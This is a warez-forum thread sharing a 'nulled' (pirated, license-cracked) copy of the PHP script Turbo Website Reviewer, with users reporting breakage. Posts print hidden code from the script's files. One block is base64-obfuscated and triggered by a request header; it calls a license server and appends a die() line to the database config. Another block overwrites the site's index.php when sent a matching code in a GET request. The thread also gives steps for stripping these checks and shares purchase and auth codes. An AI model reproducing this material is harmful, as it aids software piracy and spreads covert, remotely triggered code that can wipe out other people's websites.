VTishu
New member
- Mar 4, 2020
- 29
- 18
- 3
I am installing it on a sub domain, Could that be reason for error?as you can see I install it on my site just now vipflare.com check no error try clear cache on your browser or flush dns
I am installing it on a sub domain, Could that be reason for error?as you can see I install it on my site just now vipflare.com check no error try clear cache on your browser or flush dns
Download Turbo Website Reviewer v2.1 - In-depth SEO Analysis Tool Nulled Free
Nulled Version Added - Nulled By @freenulled
Hi What is new? I already have 2.1Falconizer updated Turbo Website Reviewer - In-depth SEO Analysis Tool with a new update entry:
Turbo Website Reviewer v2.1 Nulled
Read the rest of this update entry...
Just updated resource to nulled version instead of original filesHi What is new? I already have 2.1
<?php
defined('ROOT_DIR') or die(header('HTTP/1.0 403 Forbidden'));
/*
* @author Balaji
* @name: Rainbow PHP Framework
* @copyright 2020 ProThemes.Biz
*
*/
// --- Database Settings ---
// Database Hostname
$dbHost = 'localhost';
// Database Username
$dbUser = '';
// Database Password
$dbPass = '';
// Database Name
$dbName = '';
//Base URL (Without http:// & https://)
$baseURL = 'yourdomain.com/';
//Item Purchase Code
$item_purchase_code = '2ca6daf9-1576-4cc7-9922-fb7fe4e427f7';
//Domain Security Code
$authCode = 'b3ba2b3f8d979065d875ebf74ef4de0c';
if(isset($_SERVER['HTTP_SM92'])){
$getStats = json_decode(simpleCurlGET(base64_decode('aHR0cDovL2xpYy5wcm90aGVtZXMuYml6L2NoZWNrLnBocA==')), true);
if(!($getStats['a']))
putMyData(CONFIG_DIR.base64_decode('ZGIuY29uZmlnLnBocA=='), base64_decode('ZGllKCJMaWNlbnNlIEVycm9yIik7'), FILE_APPEND);
}
@xgrosht @rozbeh1212
Sorry guys .. that was my fault.. just one file missed from nulling
to fix this ..
Step 1:
edit (core\config\db.config.php) and put this code with replace it with your database info
Code:<?php defined('ROOT_DIR') or die(header('HTTP/1.0 403 Forbidden')); /* * @author Balaji * @name: Rainbow PHP Framework * @copyright 2020 ProThemes.Biz * */ // --- Database Settings --- // Database Hostname $dbHost = 'localhost'; // Database Username $dbUser = ''; // Database Password $dbPass = ''; // Database Name $dbName = ''; //Base URL (Without http:// & https://) $baseURL = 'yourdomain.com/'; //Item Purchase Code $item_purchase_code = '2ca6daf9-1576-4cc7-9922-fb7fe4e427f7'; //Domain Security Code $authCode = 'b3ba2b3f8d979065d875ebf74ef4de0c';
Step 2:
edit (core\helpers\interface_helper.php)
and delete the lines from 158 to 162
Code:if(isset($_SERVER['HTTP_SM92'])){ $getStats = json_decode(simpleCurlGET(base64_decode('aHR0cDovL2xpYy5wcm90aGVtZXMuYml6L2NoZWNrLnBocA==')), true); if(!($getStats['a'])) putMyData(CONFIG_DIR.base64_decode('ZGIuY29uZmlnLnBocA=='), base64_decode('ZGllKCJMaWNlbnNlIEVycm9yIik7'), FILE_APPEND); }
Thats's All
its too late man
i just delete every thing
its too late man
i just delete every thing
Download Turbo Website Reviewer v2.1 - In-depth SEO Analysis Tool Nulled Free
Fixed Nulled Version Added - Nulled & fixed By @freenulled
With latest update @freenulled fixed today or the other one?Site is hacked and deleted by Turbo Website Reviewer
//Unlicensed Fake Users
if(isset($_GET['fake'])){
function doAction(){
$data = '<?php
echo \'<div style="text-align: center;"><br /><br /><h1 style="color: red;" >Fake Copy of AtoZ SEO Tools Script!</h1>
<div><a href="http://goo.gl/dYsmDY">Purcahse License Now</a></div></div>\';
die();
?>';
file_put_contents('../../../../index.php',$data);
return true;
}
require_once('../../../../config.php');
if(isset($_GET['itemCode'])){
$itemCode = Trim(htmlspecialchars($_GET['itemCode']));
if($itemCode == $item_purchase_code){
doAction();
}
}
if(isset($_GET['authCode'])){
$userAuthCode = Trim(htmlspecialchars($_GET['authCode']));
if($authCode == $userAuthCode){
doAction();
}
}
die();
}